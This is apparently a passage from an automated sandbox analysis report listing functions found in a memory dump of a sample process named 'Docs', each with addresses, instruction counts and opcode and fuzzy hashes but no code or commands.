                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6da4bc71e599409fd822b15552767d96e12d1c48c356c2880e43d15eb07304f8
                                                              • Instruction ID: 0e677552dfbd305442f409deeda26954a7a426f68f15db30a2e1852e1fb88b91
                                                              • Opcode Fuzzy Hash: 6da4bc71e599409fd822b15552767d96e12d1c48c356c2880e43d15eb07304f8
                                                              • Instruction Fuzzy Hash: 2AF027264157818BCF325F7CEC503D1BB5DA741018F0920A9E8A057305C6749493C364
                                                              Function 015DC5ED Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b599122bedc1f2872536f19785da280bea228c25e71cb8ae7e840db4c019bc65
                                                              • Instruction ID: 527ce56c4650b966d3525d56869474d79ef88e4bb6ff9b0fae14482afc6c249e
                                                              • Opcode Fuzzy Hash: b599122bedc1f2872536f19785da280bea228c25e71cb8ae7e840db4c019bc65
                                                              • Instruction Fuzzy Hash: 8AF0E2715226519FE732971CC188B59BBD4BB417A0F1C982DE5068F512C660E880CB50
                                                              Function 015E2619 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 387fee6d3651f5c8d8df3e4e33502d458b369a356112caba64c01883d760c078
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: 5EE0D8727406022BE7169F598CC4F477BAEFFD2B10F04447DB5045F252CAE2DD0986A4
                                                              Function 01636030 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: 5bbe51e42b2efb82ca4bd4897031bf2e0bcfce20ea788c3ca40358ff7a7aa543
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: 9BF0A072100204AFE3218F09DE81F52F7F8EB85364F01C025E6089B260D37AEC40CBA0
                                                              Function 015A0710 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: dc4bccab5da73230d06ede4a9e3ff6f5b24dd7bf4b4b60697ecd7314e4d07702
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: 0FF0E53A2043459FDB16CF19C440A997FE4FB41390F010458FD428F351D731E981CB55
                                                              Function 015D49D0 Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction ID: f4f245272fa04d4b991e0ac4b7d3d2fc3e89e64e9259f03f330188e7b59bb70d
                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction Fuzzy Hash: B1E0D832254146AFD3311A5D8800B7A77E7FBD07A0F160429E2408F954DBF0DC80C7D9
                                                              Function 01674164 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99d484edcb89bd38cff212120b63e9dd5265cab169809c058418c48f75803dfc
                                                              • Instruction ID: daeb0e8c0be8b7992ae0ed194e8e3819e42bf8648ffc7745cd34167864528a13
                                                              • Opcode Fuzzy Hash: 99d484edcb89bd38cff212120b63e9dd5265cab169809c058418c48f75803dfc
                                                              • Instruction Fuzzy Hash: C7F06531A259D14FE772E72CF988F6577E4AF50631F1A0954D4058BA12CB24DC40C650
                                                              Function 0164678E Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: bed2a4b6fc0db3993016432ad372967f617dbfae5ce71cfe5124f10fc715c372
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: 7CE04872640215BBDB219759CD05F9A7EACEB94E90F154055F601DB194E570DE00D690
                                                              Function 016708C0 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                              • Instruction ID: 627b63faa14a3ea0690e6935693bb5631524d4f79a68cab84ecc8e1537376d0a
                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                              • Instruction Fuzzy Hash: 85E09B316403508BCF258A1DC940A53B7EDDF96760F16806EE90547712C331F843CAE0
                                                              Function 015A25E0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8a00c165e6cec3a345d52dd301938dcf61c8cc715b11c2e404de18a9be5f6ffe
                                                              • Instruction ID: 1adee32ff5fcff8088c08e9920a50d57f56ebfcaf06c5cec72ee03cd6d52ba54
                                                              • Opcode Fuzzy Hash: 8a00c165e6cec3a345d52dd301938dcf61c8cc715b11c2e404de18a9be5f6ffe
                                                              • Instruction Fuzzy Hash: C5E092321006559BC721BF69DD01F8A779EFFA0360F014515B1555B190CB70A810C7C4
                                                              Function 0165A456 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                              • Instruction ID: 26104fe0357e83f79c6fe69358b25ef34495389d64cb7d9d9eef86e4ce3f8eb6
                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                              • Instruction Fuzzy Hash: 63E09231011613DFE7766FAACC4CB527EE4FF90711F148D2CA0961A6B0C7B598C1CA40
                                                              Function 01624000 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction ID: 3ec668be6c2d0f4b85a59e9435e911feff4f6d2588d34c7dc97ee1e53edd43a2
                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction Fuzzy Hash: 07E0C2343007158FE715CF1AC440B627BB6BFD5A10F28C068E9488F305EB36E882CB40
                                                              Function 015DCA38 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ef901114994bbdc231e226480180e5c219c3f1333f13d2e0afb8c01a0035494
                                                              • Instruction ID: b333d0315eaa99f7c165270d71b9048a028840f2b930d6aba019d7f70a2d9111
                                                              • Opcode Fuzzy Hash: 5ef901114994bbdc231e226480180e5c219c3f1333f13d2e0afb8c01a0035494
                                                              • Instruction Fuzzy Hash: 53D02B324E10216ECB36E52CBC44FD73A9DBB80720F0188A9F1089E010D595CC81D3C4
                                                              Function 0159823B Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction ID: a3569a6c7badadfba550a62b703d3b2bcd551490683049ac12d5014ec98dff2f
                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction Fuzzy Hash: CDE0C232840A1AEFDF322F25DC44F5576E9FF95B10F204C6EE0811E0A887B4AC81CB45
                                                              Function 015A2050 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd30df8a28bced1d5757bbe9f685f3d0b5ec2ac1d75d2e25c94fc8067e7adbe4
                                                              • Instruction ID: c3c67ee4a6b9ce638fd8780c2715232bd3d99436e6e6d8576064eaaf60939b7b
                                                              • Opcode Fuzzy Hash: dd30df8a28bced1d5757bbe9f685f3d0b5ec2ac1d75d2e25c94fc8067e7adbe4
                                                              • Instruction Fuzzy Hash: F1E08C321405616BC311FE9DDD51E8A739EFFE4260F440121B1509B294CA60AC10C794
                                                              Function 015D8A90 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction ID: 1e583e4c7ffdf3521f2bf283bd3ef9ea473712fd5b49f6547371adb2b4f194d4
                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction Fuzzy Hash: B5E04F33111A1487C728DE18D511A6677A4FB45730B09462AA6138B780C574E544C795
                                                              Function 015DE59C Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction ID: e0b898caad1ad8740e96c2c1e4d8cc11aa7c0bb0a99167da086c079e105c4392
                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction Fuzzy Hash: B8D0A932224620ABD7B2AA1CFC00FC333E8BB88B20F0A0459B008CB154C360AC81CA84
                                                              Function 0161E908 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction ID: 65ff0947c94f020a1e3823fa4443e9bc7008223dea94312c5c2da8cea0e34421
                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction Fuzzy Hash: 27E0EC359506859BDF53DFA9CA40F5EBBB5FB94B40F190454A5086F664C735E900CB40
                                                              Function 0159A0E3 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction ID: 6e4fe60b9846fc5275d82b59ab7bfd0773838163571151d1e532a4aee4f64bec
                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction Fuzzy Hash: 67D0223222203193CF285695A800FA76905FFC1A90F0A002C340AAB800C2148C42D2F0
                                                              Function 015DA830 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction ID: 45de6d1f75cb4a200f6252188b3be26ae342433235455887294b564e73a16b66
                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction Fuzzy Hash: 31D012371E054DBBCB519FA6DC41F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                              Function 015DCA24 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                              • Instruction ID: bbeff8119dc9e53feac32dc251fbb17f9ac6e4cc59a404f624301bd4c4128ac6
                                                              • Opcode Fuzzy Hash: 358b9887f143b7aa9af23945905a3f3c61212e097758d035e88777ba64098001
                                                              • Instruction Fuzzy Hash: 27D0A730552102CBDF26CF8CCD10D6E36B8FF20640B44006CE70057524D364FC11C740
                                                              Function 015B02A0 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction ID: 841c5033d08fa538e7438c1ed48efff6cbb26d30fb15f314d2f468ed78cce8d7
                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction Fuzzy Hash: E7D0C935212E80CFD62BCB0CC9A4B5A73B4BB44B44F810490F501CBBA2D62CD944CA00
                                                              Function 015DC700 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction ID: ccf773aaee35b82dc135d919dfc5d1bf9a855c600ed1934fafc284f1c488c9be
                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction Fuzzy Hash: ACC012322A0648AFC752AA99CD41F427BA9FBA8B40F000021F2048B670C631E820EA84
                                                              Function 015C0310 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: 4a50a51bdd3ab35f1d9cf96849b95ef5e5e92891abf196b452599efe26cfb64a
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: 6ED01236100249EFCB01DF85C890D9A772AFBD8F10F109019FD190B6508A31ED63DA50
                                                              Function 015A0750 Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 8516e0ef21a31bb815dcc39fd2cca30af36bc7baba4d8da1b2345110353981ea
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: E6C04879701A428FCF16DF2AD6D4F8977E4FB84780F160890E905DFB22E624E801CA10
                                                              Function 015E4340 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                              • Instruction ID: d58513a0ca291f395633aa437d8cea2a056142e0857221d7d7388d6ff84fe879
                                                              • Opcode Fuzzy Hash: a01d78f79e5bb9643e21cfa62a4feb286cc97b856b9c5541d4b0664eb1f5b206
                                                              • Instruction Fuzzy Hash: 7A900231605800129540715848845464045F7E1311B59C415E1824954CCB54CA6A5361
                                                              Function 015E4650 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                              • Instruction ID: 0b6a207645f8f9d11ca742a750b07fbd4d2de228218e3dad05f14060a6f8daaf
                                                              • Opcode Fuzzy Hash: 8b9865e7a168abd0434784c21f321c54ea8329961a9571e091f2f16662e60d50
                                                              • Instruction Fuzzy Hash: ED900261601500424540715848044066045F7E2311399C519A1954960CC758C9699369
                                                              Function 015E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                              • Instruction ID: c044945311c9e70a8ec7e7972c3ae08a7142e8f6a4ba88eb482f6e82d02e5fca
                                                              • Opcode Fuzzy Hash: 49d0824c6c34bbf2d384dc927bc0f47875b1b7fbc30fefd7c1afaaad60c124d5
                                                              • Instruction Fuzzy Hash: DB90023120140802D5807158440464A0045E7D2311F99C419A1425A54DCB55CB6D77A1
                                                              Function 015E2BE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                              • Instruction ID: debb971c7c879b467167c0ac6ff2ec713f34cc232839c15aeda100315fe52be6
                                                              • Opcode Fuzzy Hash: 88798e5ec5b51882c9f9a70f6d7b956685470960b9249be603b81ced63fcf6f5
                                                              • Instruction Fuzzy Hash: 0D90023120544842D54071584404A460055E7D1315F59C415A1464A94DD765CE69B761
                                                              Function 015E2B80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                              • Instruction ID: 5c41ead594921ec8ee1e66c1fa2aa9d020ebbde83de2d06462f5331aae3623ae
                                                              • Opcode Fuzzy Hash: 9f561f297c0d62e335bfa0445fe81aa1f7eea5ff818e17e8153ba2746ea8321d
                                                              • Instruction Fuzzy Hash: 6790023120140802D504715848046860045E7D1311F59C415A7424A55ED7A5C9A57231
                                                              Function 015E2BA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                              • Instruction ID: bd1ca904743929f32ae4f581f2e5032fc7693bb0d879b31e0e7b9843d2330574
                                                              • Opcode Fuzzy Hash: a50ca8d515f6226e0b799047274c373dbb8ab7b9c0e0fff5684f1a94a847e6f3
                                                              • Instruction Fuzzy Hash: AF90023160540802D550715844147460045E7D1311F59C415A1424A54DC795CB6977A1
                                                              Function 015E2AD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                              • Instruction ID: 5fe5ed90c7d822e32005a4f01dff6ab530e006fa2ab38025615d0bd398b5d937
                                                              • Opcode Fuzzy Hash: af639566ed5ee3594d1ca8ba4fc939ccdb9caf138992645d99642f6accbe2045
                                                              • Instruction Fuzzy Hash: 77900225211400030505B55807045070086E7D6361359C425F2415950CD761C9755221
                                                              Function 015E2AF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                              • Instruction ID: dfa289596148c72172eeb2e4fa07ff662a48d986c3543c8c2d1e013a9f9d3c72
                                                              • Opcode Fuzzy Hash: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                              • Instruction Fuzzy Hash: DE900225221400020545B558060450B0485F7D7361399C419F2816990CC761C9795321
